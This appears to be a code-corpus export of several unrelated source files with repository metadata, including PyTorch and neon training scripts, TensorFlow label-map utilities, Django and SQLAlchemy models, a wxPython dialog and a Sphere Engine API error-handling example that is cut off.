help='Initial learning rate.')
parser.add_argument('--lr_stepsize', default=1e4, type=int,
help='Learning rate step size.')
parser.add_argument('--batch-size', type=int, default=8, metavar='B',
help='the mini-batch size (default: 2)')
parser.add_argument('--num-workers', default=8, type=int,
help='the number of workers for the dataloader.')
parser.add_argument('--tensorboard', action='store_true', default=True,
help='use tensorboard for logging purposes'),
parser.add_argument('--gpu', type=str, default='1',
help='select GPU'),
parser.add_argument('--img_width', type = int, default = 400, help='image size for training')
parser.add_argument('--img_height', type = int, default = 400, help='image size for training')
parser.add_argument('--channel_swap', default=[2, 1, 0], type=int)
parser.add_argument('--crop_img', default=False, type=bool,
help='If true crop training images, other ways resizing')
parser.add_argument('--mean_pixel_values', default=[104.00699, 116.66877, 122.67892, 137.86],
type=float) # [103.939,116.779,123.68] [104.00699, 116.66877, 122.67892]
args = parser.parse_args()
tb_writer = None
if args.tensorboard and not args.is_testing:
from tensorboardX import SummaryWriter # previous torch version
# from torch.utils.tensorboard import SummaryWriter # for torch 1.4 or greather
tb_writer = SummaryWriter(log_dir=args.output_dir)
print(" **** You have available ", torch.cuda.device_count(), "GPUs!")
print("Pytorch version: ", torch.__version__)
os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu
device = torch.device('cpu' if torch.cuda.device_count() == 0 else 'cuda')
model = DexiNet().to(device)
# model = nn.DataParallel(model)
model.apply(weight_init)
if not args.is_testing:
dataset_train = BipedMyDataset(args.input_dir, train_mode='train',
arg=args)
dataloader_train = DataLoader(dataset_train, batch_size=args.batch_size,
shuffle=True, num_workers=args.num_workers)
dataset_val = testDataset(args.input_val_dir, arg=args)
dataloader_val = DataLoader(dataset_val, batch_size=args.batch_size,
shuffle=False, num_workers=args.num_workers)
# for testing
if args.is_testing:
model.load_state_dict(torch.load(os.path.join(args.output_dir,args.checkpoint_data), map_location=device))
model.eval()
output_dir = os.path.join(args.res_dir, "BIPED2" + args.test_data)
with torch.no_grad():
for batch_id, sample_batched in enumerate(dataloader_val):
images = sample_batched['images'].to(device)
if not args.test_data == "CLASSIC":
labels = sample_batched['labels'].to(device)
file_names = sample_batched['file_names']
image_shape = sample_batched['image_shape']
print("input image size: ",images.shape)
output = model(images)
save_image_batch_to_disk(output, output_dir, file_names,image_shape, arg=args)
print("Testing ended in ",args.test_data, "dataset")
sys.exit()
criterion = weighted_cross_entropy_loss
optimizer = optim.Adam(model.parameters(), lr=args.lr, weight_decay=1e-4)
# Learning rate scheduler.
# lr_schd = lr_scheduler.StepLR(optimizer, step_size=args.lr_stepsize,
# gamma=args.lr_gamma)
for epoch in range(args.num_epochs):
# Create output directory
output_dir_epoch = os.path.join(args.output_dir, str(epoch))
img_test_dir = os.path.join(output_dir_epoch,args.test_data+'_res')
create_directory(output_dir_epoch)
create_directory(img_test_dir)
# with torch.no_grad():
# validation(epoch, dataloader_val, model, device, img_test_dir,arg=args)
train(epoch, dataloader_train, model, criterion, optimizer, device,
args.log_interval_vis, tb_writer, args=args)
# lr_schd.step() # decay lr at the end of the epoch.
with torch.no_grad():
validation(epoch, dataloader_val, model, device, img_test_dir,arg=args)
try:
net_state_dict = model.module.state_dict()
except:
net_state_dict = model.state_dict()
torch.save(net_state_dict, os.path.join(
output_dir_epoch, '{0}_model.pth'.format(epoch)))
if __name__ == '__main__':
main()
| [
"sashashengyt@gmail.com"
] | sashashengyt@gmail.com |
5ec786f6620462f9179a0a659728a5f293abe6a9 | 0cef8deb473ffac47344dd46039b9f962d9d0ccf | /examples/ptb/char_rae.py | 5ceecf3aa2af2408ab7043f68c70848b8c46f69a | [
"Apache-2.0"
] | permissive | NervanaSystems/ngraph-neon | 6045d51b6c67348b0df8cbe051253543b691f29d | 3d17f06ae723ec5c2e3a52c9c840b4d6c7640f22 | refs/heads/master | 2023-06-22T02:54:20.143134 | 2023-01-03T22:54:35 | 2023-01-03T22:54:35 | 83,846,593 | 14 | 6 | Apache-2.0 | 2022-10-17T03:51:08 | 2017-03-03T22:19:31 | Python | UTF-8 | Python | false | false | 6,826 | py | #!/usr/bin/env python
# ******************************************************************************
# Copyright 2017-2018 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ******************************************************************************
"""
Character-level recurrent autoencoder. This model shows how to build an Encoder-Decoder style RNN.
The model uses a sequence from the PTB dataset as input, and learns to output
the same sequence in reverse order.
"""
import numpy as np
from contextlib import closing
import neon as ng
from neon.frontend import Layer, Preprocess, Recurrent, Affine, Softmax, Tanh
from neon.frontend import UniformInit, RMSProp
from neon.frontend import ax, loop_train
from neon.frontend import NeonArgparser, make_bound_computation, make_default_callbacks
from neon.frontend import SequentialArrayIterator
import neon.transformers as ngt
from neon.frontend import PTB
# parse the command line arguments
parser = NeonArgparser(__doc__)
parser.set_defaults(batch_size=128, num_iterations=2000)
args = parser.parse_args()
# model parameters
time_steps = 5
hidden_size = 256
gradient_clip_value = 5
# download penn treebank
# set shift_target to be False, since it is going to predict the same sequence
tree_bank_data = PTB(path=args.data_dir, shift_target=False)
ptb_data = tree_bank_data.load_data()
train_set = SequentialArrayIterator(ptb_data['train'],
batch_size=args.batch_size,
time_steps=time_steps,
total_iterations=args.num_iterations,
reverse_target=True,
get_prev_target=True)
valid_set = SequentialArrayIterator(ptb_data['valid'],
batch_size=args.batch_size,
time_steps=time_steps,
total_iterations=10,
reverse_target=True,
get_prev_target=True)
inputs = train_set.make_placeholders()
ax.Y.length = len(tree_bank_data.vocab)
def generate_samples(inputs, encode, decode, num_time_steps):
"""
Inference
"""
encoding = encode(inputs)
decoder_input = np.zeros(decode.computation_op.parameters[0].axes.lengths)
state = encoding
tokens = list()
for step in range(num_time_steps):
output, state = decode(decoder_input, state.squeeze())
index = np.argmax(output, axis=0)
decoder_input[:] = 0
decoder_input[index] = 1
tokens.append(index)
return np.squeeze(np.array(tokens)).T
def expand_onehot(x):
return ng.one_hot(x, axis=ax.Y)
# weight initialization
init = UniformInit(low=-0.08, high=0.08)
# model initialization
one_hot_enc = Preprocess(functor=expand_onehot)
enc = Recurrent(hidden_size, init, activation=Tanh(), reset_cells=True, return_sequence=False)
one_hot_dec = Preprocess(functor=expand_onehot)
dec = Recurrent(hidden_size, init, activation=Tanh(), reset_cells=True, return_sequence=True)
linear = Affine(init, activation=Softmax(), bias_init=init, axes=(ax.Y))
optimizer = RMSProp(decay_rate=0.95, learning_rate=2e-3, epsilon=1e-6,
gradient_clip_value=gradient_clip_value)
# build network graph
one_hot_enc_out = one_hot_enc(inputs['inp_txt'])
one_hot_dec_out = one_hot_dec(inputs['prev_tgt'])
enc_out = enc(one_hot_enc_out)
dec_out = dec(one_hot_dec_out, init_state=enc_out)
output_prob = linear(dec_out)
loss = ng.cross_entropy_multi(output_prob,
ng.one_hot(inputs['tgt_txt'], axis=ax.Y),
usebits=True)
mean_cost = ng.mean(loss, out_axes=[])
updates = optimizer(loss)
train_outputs = dict(batch_cost=mean_cost, updates=updates)
loss_outputs = dict(cross_ent_loss=loss)
# inference graph
with Layer.inference_mode_on():
enc_out_inference = enc(one_hot_enc_out)
# Create decoder placeholders
axes = one_hot_dec_out.axes
axes = axes - axes.recurrent_axis() + ng.make_axis(length=1, name="REC")
decoder_input_inference = ng.placeholder(axes, name="input")
decoder_state_inference = ng.placeholder(enc_out_inference.axes, name="state")
dec_out_inference = dec(decoder_input_inference, init_state=decoder_state_inference)
inference_out = linear(dec_out_inference)
encoder_computation = ng.computation(enc_out_inference, inputs["inp_txt"])
decoder_computation = ng.computation([inference_out, dec_out_inference],
decoder_input_inference,
decoder_state_inference)
######################
# Train Loop
# Now bind the computations we are interested in
with closing(ngt.make_transformer()) as transformer:
# training computations
train_computation = make_bound_computation(transformer, train_outputs, inputs)
loss_computation = make_bound_computation(transformer, loss_outputs, inputs)
cbs = make_default_callbacks(transformer=transformer,
output_file=args.output_file,
frequency=args.iter_interval,
train_computation=train_computation,
total_iterations=args.num_iterations,
eval_set=valid_set,
loss_computation=loss_computation,
use_progress_bar=args.progress_bar)
# inference computations
encoder_function = transformer.add_computation(encoder_computation)
decoder_function = transformer.add_computation(decoder_computation)
# training
loop_train(train_set, cbs)
# inference
valid_set.reset()
num_errors = 0
for mb_idx, data in enumerate(valid_set):
tokens = generate_samples(data["inp_txt"], encoder_function, decoder_function, time_steps)
num_errors += len(np.argwhere(tokens != data["tgt_txt"]))
num_total = valid_set.total_iterations * (time_steps * args.batch_size)
print('Misclassification error: {} %'.format(float(num_errors) / num_total * 100))
# print some samples
for sample_idx in range(5):
print(''.join([tree_bank_data.vocab[i] for i in tokens[sample_idx, :]])[::-1])
| [
"sang.ik.lee@intel.com"
] | sang.ik.lee@intel.com |
0e6b15d493b10254f9e208b5e71756058f247465 | 84f073856c8665b0f8b813a46a38f96ccd4f2790 | /object_detection/utils/label_map_util.py | c5e5c86fb326b6e7ce16928714c3540fbed82932 | [] | no_license | fengrk/ml_tools | ad9336e47447e9a0f63ba7fc2e86c7eea51c955e | 70e634250455ff6f3aeb826e781b8096adbdc066 | refs/heads/master | 2023-07-19T15:34:46.780323 | 2019-03-02T03:59:53 | 2019-03-02T03:59:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,442 | py | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Label map utility functions."""
import logging
import tensorflow as tf
from google.protobuf import text_format
from ml_tools.object_detection.protos import string_int_label_map_pb2
def _validate_label_map(label_map):
"""Checks if a label map is valid.
Args:
label_map: StringIntLabelMap to validate.
Raises:
ValueError: if label map is invalid.
"""
for item in label_map.item:
if item.id < 0:
raise ValueError('Label map ids should be >= 0.')
if (item.id == 0 and item.name != 'background' and
item.display_name != 'background'):
raise ValueError('Label map id 0 is reserved for the background label')
def create_category_index(categories):
"""Creates dictionary of COCO compatible categories keyed by category id.
Args:
categories: a list of dicts, each of which has the following keys:
'id': (required) an integer id uniquely identifying this category.
'name': (required) string representing category name
e.g., 'cat', 'dog', 'pizza'.
Returns:
category_index: a dict containing the same entries as categories, but keyed
by the 'id' field of each category.
"""
category_index = {}
for cat in categories:
category_index[cat['id']] = cat
return category_index
def get_max_label_map_index(label_map):
"""Get maximum index in label map.
Args:
label_map: a StringIntLabelMapProto
Returns:
an integer
"""
return max([item.id for item in label_map.item])
def convert_label_map_to_categories(label_map,
max_num_classes,
use_display_name=True):
"""Given label map proto returns categories list compatible with eval.
This function converts label map proto and returns a list of dicts, each of
which has the following keys:
'id': (required) an integer id uniquely identifying this category.
'name': (required) string representing category name
e.g., 'cat', 'dog', 'pizza'.
We only allow class into the list if its id-label_id_offset is
between 0 (inclusive) and max_num_classes (exclusive).
If there are several items mapping to the same id in the label map,
we will only keep the first one in the categories list.
Args:
label_map: a StringIntLabelMapProto or None. If None, a default categories
list is created with max_num_classes categories.
max_num_classes: maximum number of (consecutive) label indices to include.
use_display_name: (boolean) choose whether to load 'display_name' field as
category name. If False or if the display_name field does not exist, uses
'name' field as category names instead.
Returns:
categories: a list of dictionaries representing all possible categories.
"""
categories = []
list_of_ids_already_added = []
if not label_map:
label_id_offset = 1
for class_id in range(max_num_classes):
categories.append({
'id': class_id + label_id_offset,
'name': 'category_{}'.format(class_id + label_id_offset)
})
return categories
for item in label_map.item:
if not 0 < item.id <= max_num_classes:
logging.info(
'Ignore item %d since it falls outside of requested '
'label range.', item.id)
continue
if use_display_name and item.HasField('display_name'):
name = item.display_name
else:
name = item.name
if item.id not in list_of_ids_already_added:
list_of_ids_already_added.append(item.id)
categories.append({'id': item.id, 'name': name})
return categories
def load_labelmap(path):
"""Loads label map proto.
Args:
path: path to StringIntLabelMap proto text file.
Returns:
a StringIntLabelMapProto
"""
with tf.gfile.GFile(path, 'r') as fid:
label_map_string = fid.read()
label_map = string_int_label_map_pb2.StringIntLabelMap()
try:
text_format.Merge(label_map_string, label_map)
except text_format.ParseError:
label_map.ParseFromString(label_map_string)
_validate_label_map(label_map)
return label_map
def get_label_map_dict(label_map_path,
use_display_name=False,
fill_in_gaps_and_background=False):
"""Reads a label map and returns a dictionary of label names to id.
Args:
label_map_path: path to StringIntLabelMap proto text file.
use_display_name: whether to use the label map items' display names as keys.
fill_in_gaps_and_background: whether to fill in gaps and background with
respect to the id field in the proto. The id: 0 is reserved for the
'background' class and will be added if it is missing. All other missing
ids in range(1, max(id)) will be added with a dummy class name
("class_<id>") if they are missing.
Returns:
A dictionary mapping label names to id.
Raises:
ValueError: if fill_in_gaps_and_background and label_map has non-integer or
negative values.
"""
label_map = load_labelmap(label_map_path)
label_map_dict = {}
for item in label_map.item:
if use_display_name:
label_map_dict[item.display_name] = item.id
else:
label_map_dict[item.name] = item.id
if fill_in_gaps_and_background:
values = set(label_map_dict.values())
if 0 not in values:
label_map_dict['background'] = 0
if not all(isinstance(value, int) for value in values):
raise ValueError('The values in label map must be integers in order to'
'fill_in_gaps_and_background.')
if not all(value >= 0 for value in values):
raise ValueError('The values in the label map must be positive.')
if len(values) != max(values) + 1:
# there are gaps in the labels, fill in gaps.
for value in range(1, max(values)):
if value not in values:
label_map_dict['class_' + str(value)] = value
return label_map_dict
def create_categories_from_labelmap(label_map_path, use_display_name=True):
"""Reads a label map and returns categories list compatible with eval.
This function converts label map proto and returns a list of dicts, each of
which has the following keys:
'id': an integer id uniquely identifying this category.
'name': string representing category name e.g., 'cat', 'dog'.
Args:
label_map_path: Path to `StringIntLabelMap` proto text file.
use_display_name: (boolean) choose whether to load 'display_name' field
as category name. If False or if the display_name field does not exist,
uses 'name' field as category names instead.
Returns:
categories: a list of dictionaries representing all possible categories.
"""
label_map = load_labelmap(label_map_path)
max_num_classes = max(item.id for item in label_map.item)
return convert_label_map_to_categories(label_map, max_num_classes,
use_display_name)
def create_category_index_from_labelmap(label_map_path, use_display_name=True):
"""Reads a label map and returns a category index.
Args:
label_map_path: Path to `StringIntLabelMap` proto text file.
use_display_name: (boolean) choose whether to load 'display_name' field
as category name. If False or if the display_name field does not exist,
uses 'name' field as category names instead.
Returns:
A category index, which is a dictionary that maps integer ids to dicts
containing categories, e.g.
{1: {'id': 1, 'name': 'dog'}, 2: {'id': 2, 'name': 'cat'}, ...}
"""
categories = create_categories_from_labelmap(label_map_path, use_display_name)
return create_category_index(categories)
def create_class_agnostic_category_index():
"""Creates a category index with a single `object` class."""
return {1: {'id': 1, 'name': 'object'}}
| [
"frkhit@gmail.com"
] | frkhit@gmail.com |
e8041325e5a03187eca417efcb61e8e3c5da43ac | 59144f1514d0e546000848661effc7a503e109ed | /python/add_file.py | 2666a2744e64fcf7a7aa3320e8664073599639fd | [] | no_license | rahul-pathak-12/Capture-Point-Modelling | b7231f708e67c8bc88404bb2f29c145421ea98e0 | cbcbb2458c807c53d0a1c7139d21ad204c9564c3 | refs/heads/main | 2022-12-25T15:08:27.038837 | 2020-10-12T21:29:55 | 2020-10-12T21:29:55 | 303,515,864 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,408 | py | import os
from os import listdir
from os.path import isfile, join
from sklearn import preprocessing
import numpy as np
import pandas as pd
VERSION = "TRAIN"
DIR_ORIGIN = "C:\\Users\\User\\Desktop\\RAW_DATA\\\STEP_MODELLING\\" + VERSION + "\\"
DIR_DEST = "C:\\Users\\User\\Desktop\\RAW_DATA\\\STEP_MODELLING_PROCESSED\\" + VERSION + "\\"
files = [ f for f in listdir(DIR_ORIGIN) ]
#This is V_SACRAL -> X1 in the file
leg_length = {
'2': 0.88392578,
'3': 1.0372605,
'4': 1.0227856,
'5': 1.0670828,
'6': 1.0213803,
'7': 0.97300665,
'8': 0.91221417,
'9': 0.93919006,
}
for file in files:
fpath = DIR_ORIGIN + file
tpath = DIR_DEST + "ADJ_" + file
nfirstlines = []
with open( fpath ) as f:
df = pd.read_csv( fpath, sep='\t' )
mean = df["center_of_mass_Y"].mean()
rows = df.shape[0]
mean_update = [mean] * rows
df["AVERAGE_COMY"] = mean_update
subj = file[ 0 ]
height = leg_length[ subj ]
leg_length_update = [height] * rows
df["LEG_LENGTH"] = leg_length_update
comx = df["center_of_mass_X"][0]
comx_values = df["center_of_mass_X"] - comx
df["ADJ_COMX"] = comx_values
nfirstlines.append( next(f) )
df.to_csv( tpath, sep='\t', index_label = 'N' ) | [
"rahul.pathak@hotmail.com"
] | rahul.pathak@hotmail.com |
7ecc834bd42da9a9ef5316f8cbec45fb208fb2ac | 9e0e3a155f7f533b178d4ed31ae7a16050e414c2 | /edx-ai-week4-project-master/edx-ai-week4-project-master/KernelCalculator.py | 14d764b07feafc728556d44b59674f92415fd826 | [] | no_license | RudraNilBasu/edx_AI | 1c67595fbf4d12619e61282d88b7374dc01d9e98 | 5c80bb241b7d79cb6fdd9d331d03e8171a46e642 | refs/heads/master | 2021-08-22T08:42:16.809292 | 2017-11-29T19:40:22 | 2017-11-29T19:40:22 | 112,519,558 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 423 | py | import FastGrid
from Util import Util
from UtilityCalculation import UtilityCalculator
class KernelCalculator(UtilityCalculator):
def __init__(self, create_snake=True, ramp_amplification=2.0):
self.kernel = Util.compute_kernel(create_snake=create_snake, ramp_amplification=ramp_amplification)
def compute_utility(self, grid: FastGrid):
return sum(x * y for (x,y) in zip(self.kernel, grid.board))
| [
"rudra.nil.basu.1996@gmail.com"
] | rudra.nil.basu.1996@gmail.com |
0fed331e4c8562a59ca97e427cf0565c82985187 | 9b2789e2933f67f7d089f71ffb1ea9a1b4745fca | /spider_project/spider_market/admin.py | 9cd5eeb9fe66ce95a5bd09273ea2ad17de606998 | [
"MIT"
] | permissive | Sam1808/SG | eaff1b9eca9c1a2f29bdb520a56e65d71c576a81 | 4352aebdc35b5d84be09863af5d85b843e039e20 | refs/heads/main | 2023-03-16T19:52:44.466833 | 2021-03-01T08:17:42 | 2021-03-01T08:17:42 | 331,236,041 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 436 | py | from django.contrib import admin
from .models import Category
from .models import Company
from .models import Product
from .models import User
@admin.register(Category)
class CategoryAdmin(admin.ModelAdmin):
pass
@admin.register(Company)
class CompanyAdmin(admin.ModelAdmin):
pass
@admin.register(Product)
class ProductAdmin(admin.ModelAdmin):
pass
@admin.register(User)
class UserAdmin(admin.ModelAdmin):
pass
| [
"Anton.Pozdnyakov.I@gmail.com"
] | Anton.Pozdnyakov.I@gmail.com |
d76f8ca07d1ad9d079c6e38cf85e61ef63f39ac2 | 91a64c5b90b04c1fc66f781da07b8ee6352f6260 | /api/models/twse_over_bought.py | c92ff8585695dab0fd7233afd04f2cf8cac00915 | [] | no_license | deersheep330/svc-api | 309949f046334beb52a70cb737276c60b798fd4b | a86008a9fbd5fa45f5809d142060c311e3a08625 | refs/heads/master | 2023-02-15T09:26:48.923293 | 2021-01-13T09:11:59 | 2021-01-13T09:11:59 | 322,479,858 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 569 | py | from sqlalchemy import Column, String, Date, Integer, func, ForeignKey
from sqlalchemy.orm import relationship
from ..db import Base
class TwseOverBought(Base):
__tablename__ = 'twse_over_bought'
symbol = Column(String(16), ForeignKey('stock.symbol'), nullable=False, primary_key=True)
date = Column(Date, nullable=False, primary_key=True, server_default=func.sysdate())
quantity = Column(Integer, nullable=False)
stock = relationship('Stock')
def __repr__(self):
return str([getattr(self, c.name, None) for c in self.__table__.c])
| [
"yangchiu@inquartik.com"
] | yangchiu@inquartik.com |
13f1517af465f4f0433f3dd29f9e10ba786f7d8a | 15cd250ae98a0647f81a2eefcfd738b32f56170a | /EditarInformacion.py | 33f2e953489a6636a92c542330911f49d709f099 | [] | no_license | hernanarangoisaza/Efenergy_v2.0 | 21fed08d5497ebaa692d096b59954b15bd3154c5 | be4faadec77e4e3ab52f4dec5f89d25c061ab5f8 | refs/heads/master | 2023-01-22T03:05:05.682459 | 2020-11-25T13:32:48 | 2020-11-25T13:32:48 | 296,912,896 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,472 | py | from ArchivoInformacion import ArchivoInformacion
import wx
import easygui as eg
class EditarInformacion(wx.Frame):
def __init__(self, id, title, informacion, archivo_txt, ventana_inicio, identificador):
wx.Frame.__init__(self, None, id, title, size = (878, 350),pos=(0,0), style = wx.DEFAULT_FRAME_STYLE
& ~(wx.RESIZE_BORDER | wx.MAXIMIZE_BOX))
self.ventana_inicio = ventana_inicio
self.SetIcon(wx.Icon("Images/logo.png"))
self.panel = wx.Panel(self,-1)
self.archivo_txt = archivo_txt
self.informacion = informacion
self.identificador = identificador
self.SetBackgroundColour("#FFFFFF")
self.elementos()
def elementos(self):
nombre_variable = ["Voltaje","Potencia","Armónicos"]
panel = wx.Panel(self.panel, -1, size=(878,60), pos=wx.DefaultPosition)
txt_informacion = wx.StaticText(panel, -1, "Editar información de %s"% nombre_variable[self.identificador - 1], pos=(10, 10))
font = wx.Font(20, wx.ROMAN, wx.NORMAL, wx.NORMAL)
txt_informacion.SetFont(font)
txt_informacion.SetForegroundColour("#FFFFFF")
panel.SetBackgroundColour("#6E7B99")
txt_editar_norma = wx.StaticText(self.panel, -1, "Cambiar Archivo PDF:", pos=(650, 70))
font = wx.Font(10, wx.ROMAN, wx.NORMAL, wx.NORMAL)
txt_editar_norma.SetFont(font)
button_seleccionar = wx.Button(self.panel, -1, u"Seleccionar Norma", size=(130,30), pos=(680,100))
button_seleccionar.Bind(wx.EVT_BUTTON, self.on_seleccion_norma)
self.button_cargar = wx.Button(self.panel, -1, u"Cargar", size=(130,30), pos=(680,140))
self.button_cargar.Show(False)
self.button_cargar.Bind(wx.EVT_BUTTON, self.cargar_norma)
linea_separador = wx.StaticLine(self.panel, id=wx.ID_ANY, pos=(640,65), size=(2,240),
style=wx.LI_VERTICAL)
linea_separador.SetBackgroundColour("#6E7B99")
self.inp_informacion = wx.TextCtrl(self.panel, wx.ID_ANY, self.informacion, size=(600,200), pos=(30,70), style=wx.TE_MULTILINE)
button_editar = wx.BitmapButton( self.panel, wx.ID_ANY, wx.Bitmap(u"Images/icono_aceptar.png"), pos=(600,275), size=wx.DefaultSize, style=wx.BU_AUTODRAW|wx.NO_BORDER )
button_editar.SetBackgroundColour("#FFFFFF")
button_editar.Bind(wx.EVT_BUTTON, self.on_editar_informacion)
button_cancelar = wx.BitmapButton( self.panel, wx.ID_ANY, wx.Bitmap(u"Images/icono_cancelar.png"), pos=(30,275), size=wx.DefaultSize, style=wx.BU_AUTODRAW|wx.NO_BORDER )
button_cancelar.SetBackgroundColour("#FFFFFF")
button_cancelar.Bind(wx.EVT_BUTTON, self.on_cancelar)
def on_editar_informacion(self, event):
try:
confirmacion = self.msgPregunta("Desea guardar la información?")
if confirmacion == wx.ID_YES:
informacion = self.archivo_txt.leer_archivo()
if self.identificador == 1:
total_informacion = "%s\n&%s\n&%s" % (self.inp_informacion.GetValue(),informacion[1],informacion[2])
self.archivo_txt.escribir_archivo(total_informacion)
self.ventana_inicio.txt_informacion_voltaje.SetLabel(self.archivo_txt.leer_archivo()[0])
if self.identificador == 2:
total_informacion = "%s\n&%s\n&%s" % (informacion[0],self.inp_informacion.GetValue(),informacion[2])
self.archivo_txt.escribir_archivo(total_informacion)
self.ventana_inicio.txt_informacion_potencia.SetLabel(self.archivo_txt.leer_archivo()[1])
if self.identificador == 3:
total_informacion = "%s\n&%s\n&%s" % (informacion[0],informacion[1],self.inp_informacion.GetValue())
self.archivo_txt.escribir_archivo(total_informacion)
self.ventana_inicio.txt_informacion_armonico.SetLabel(self.archivo_txt.leer_archivo()[2])
self.msgInformacion("El texto de información se modificó correctamente")
self.Destroy()
except:
self.msgError("Ha ocurrido un Error al modificar la información")
def on_seleccion_norma(self, event):
try:
extension = ["*.pdf"]
a = None # dfgf
self.archivo = eg.fileopenbox(msg="Seleccionar PDF", title="Control", default=extension[0], filetypes=extension)
#eg.msgbox("Error en seleccion de archivo.\nEl archivo debe de ser extension xlsx", "Error", ok_button="Continuar")
if self.archivo != None:
self.button_cargar.Show( True )
else:
self.button_cargar.Show( False )
except:
self.msgError("Error al intentar seleccionar el archivo PDF")
def cargar_norma(self, event):
try:
import shutil
if self.identificador == 1:
shutil.copy(self.archivo, 'archivo/NormaVoltaje.pdf')
if self.identificador == 2:
shutil.copy(self.archivo, 'archivo/NormaPotencia.pdf')
if self.identificador == 3:
shutil.copy(self.archivo, 'archivo/NormaArmónico.pdf')
self.msgInformacion("Se cargo el archivo PDF correctamente")
self.button_cargar.Show( False )
except:
self.msgError("Error al cargar el archivo. \nPor favor verifique que el archivo seleccionado sea extensión .pdf ")
def on_cancelar(self, event):
confirmacion = self.msgPregunta("Realmente desea cancelar la operación?")
if confirmacion == wx.ID_YES:
self.Destroy()
def msgInformacion(self, mensaje):
box = wx.MessageDialog(None, mensaje, 'Información',style=wx.ICON_INFORMATION | wx.OK)
answer = box.ShowModal()
box.Destroy()
def msgError(self, mensaje):
box = wx.MessageDialog(None, mensaje, 'Error',style=wx.ICON_ERROR | wx.OK)
answer = box.ShowModal()
box.Destroy()
def msgPregunta(self, mensaje):
box = wx.MessageDialog(None, mensaje, 'Confirmación', style=wx.ICON_QUESTION|wx.YES_NO)
answer = box.ShowModal()
box.Destroy()
return answer | [
"31634784+hernanarangoisaza@users.noreply.github.com"
] | 31634784+hernanarangoisaza@users.noreply.github.com |
d823898501c02c05d1ae6ef25b3f53acb1993905 | 426d2c882d2e3197c3ae0426b85f29d61abb6367 | /src/algorithms/mock_ranking.py | 08ed5f75b785a5b78ba11663ac7fb839c0810336 | [] | no_license | pestefo/ra_recommendator_conrec | 9b5a0c1a6958ed3f0834c95b53939314394c5425 | 8274b4d6d7dbcda95a24a07c7a1acb9df6003163 | refs/heads/master | 2023-02-18T06:13:07.333750 | 2022-11-04T00:01:04 | 2022-11-04T00:01:04 | 153,520,188 | 2 | 0 | null | 2023-02-11T02:11:22 | 2018-10-17T20:34:08 | null | UTF-8 | Python | false | false | 583 | py | #!/usr/bin/env python
# coding: utf-8
from random import randint
from operator import itemgetter
class MockRanking:
ranking = None
def __init__(self):
MockRanking.ranking = []
MAX_NUM_USERS = 43872
MAX_SCORE = 2500
for i in range(1,150):
MockRanking.ranking.append((randint(1,MAX_NUM_USERS), randint(1,MAX_SCORE)))
MockRanking.ranking = sorted(MockRanking.ranking, key=itemgetter(1),reverse=True)
def ranking_for_question(self, question, limit_of_results=150):
return MockRanking.ranking[:limit_of_results] | [
"pestefo@gmail.com"
] | pestefo@gmail.com |
420170684f99d322af40a55732783f81fe0183aa | c1d6a5a715d198b556bc19240693a1621dd7f81b | /app/main/model/posts_model.py | bf6820ce99ec5fe40242db5d756e653808d1e6c2 | [] | no_license | clive1995/python-practice-proj | 0ff39e197a16a02a0d54c55d5abc7c086f05068a | 38e6010e265d0a62a16eb88ba063c0c8379a1dc9 | refs/heads/master | 2023-02-21T13:17:28.743815 | 2021-01-21T07:17:35 | 2021-01-21T07:17:35 | 327,896,120 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 768 | py | from .. import mdb
from .user_model import User
import datetime
class Likes(mdb.EmbeddedDocument):
userId = mdb.ReferenceField(User)
class Comments(mdb.EmbeddedDocument):
userId = mdb.ReferenceField(User)
publicId = mdb.UUIDField()
text = mdb.StringField()
# name = mdb.StringField()
createdOn = mdb.DateField(default=datetime.datetime.now())
class Post(mdb.Document):
userId = mdb.ReferenceField(User)
publicId = mdb.UUIDField()
text = mdb.StringField()
name = mdb.StringField(default="")
postImage = mdb.StringField(default="")
likes = mdb.ListField(mdb.EmbeddedDocumentField(Likes))
comments = mdb.ListField(mdb.EmbeddedDocumentField(Comments))
createdOn = mdb.DateField(default=datetime.datetime.now()) | [
"almeidacclive@gmail.com"
] | almeidacclive@gmail.com |
fbc081707ef66f98e229cca660ba24a576af8e5f | 479bf0773eb6b3e80a7257b15b9f203f68707669 | /Examples/V3/problems/problems/updateProblemErrorHandling.py | 258a7c614d7829c23e9bd3352cb41efa31453580 | [] | no_license | rucamedia/python-client | 56fa82c81452e9560d1eb7b5d295896391bf882f | 2b9ddbea0f9173754dfeb4f4e651a7c5a275bf52 | refs/heads/master | 2020-03-29T10:40:08.261883 | 2018-08-30T10:47:25 | 2018-08-30T10:47:25 | 149,817,070 | 1 | 0 | null | 2018-09-21T20:55:50 | 2018-09-21T20:55:50 | null | UTF-8 | Python | false | false | 1,134 | py | """
Example presents error handling for problems.update() API method
"""
from sphere_engine import ProblemsClientV3
from sphere_engine.exceptions import SphereEngineException
# define access parameters
accessToken = '<access_token>'
endpoint = '<endpoint>'
# initialization
client = ProblemsClientV3(accessToken, endpoint)
# API usage
problemCode = 'NONEXISTING_CODE'
newProblemName = 'New example problem name'
try:
response = client.problems.update(problemCode, newProblemName)
except SphereEngineException as e:
if e.code == 401:
print('Invalid access token')
elif e.code == 403:
print('Access to the problem is forbidden')
elif e.code == 400:
# aggregates two possible reasons of 400 error
# empty problem code, empty problem name
print('Bad request (empty problem code, empty problem name), details available in the message: ' + str(e))
elif e.code == 404:
# aggregates two possible reasons of 404 error
# non existing problem or masterjudge
